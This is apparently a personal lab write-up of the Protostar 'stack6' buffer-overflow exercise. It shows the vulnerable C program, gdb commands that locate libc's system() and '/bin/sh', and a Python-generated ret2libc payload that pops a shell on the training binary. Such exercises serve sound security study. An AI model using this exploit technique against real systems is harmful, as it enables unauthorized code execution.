stack6

#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> void getpath() { char buffer[64]; unsigned int ret; printf("input path please: "); fflush(stdout); gets(buffer); ret = __builtin_return_address(0); if((ret & 0xbf000000) == 0xbf000000) { printf("bzzzt (%p)\n", ret); _exit(1); } printf("got path %s\n", buffer); } int main(int argc, char **argv) { getpath(); }

(gdb) p system

$1 = {<text variable, no debug info>} 0x4007c190 <__libc_system>

(gdb) find &system,+999999999,"/bin/sh"

0x4019ca24

warning: Unable to access 16000 bytes of target memory at 0x401eac2c, halting search.

1 pattern found.

(gdb) r <<< $(python -c 'print "\x90"*72 + "\x90\xc1\x07\x40" + "AAAA" + "\x24\xca\x19\x40"')

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/s0ngsari/Desktop/study/protostar/stack6 <<< $(python -c 'print "\x90"*72 + "\x90\xc1\x07\x40" + "AAAA" + "\x24\xca\x19\x40"')

input path please: got path ������������������������������������������������������������������@������@AAAA$�@

Program received signal SIGSEGV, Segmentation fault.

0x41414141 in ?? ()

(gdb) c

Continuing.

Program terminated with signal SIGSEGV, Segmentation fault.

The program no longer exists.

(gdb) quit

root@s0ngsari-virtual-machine:~/Desktop/study/protostar# 

root@s0ngsari-virtual-machine:~/Desktop/study/protostar# ls

core  stack6  stack6.c

root@s0ngsari-virtual-machine:~/Desktop/study/protostar# (python -c 'print "\x90"*72 + "\x90\xc1\x07\x40" + "AAAA" + "\x24\xca\x19\x40"';cat;) | ./stack6

input path please: got path ������������������������������������������������������������������@������@AAAA$�@

  

ls

core  stack6  stack6.c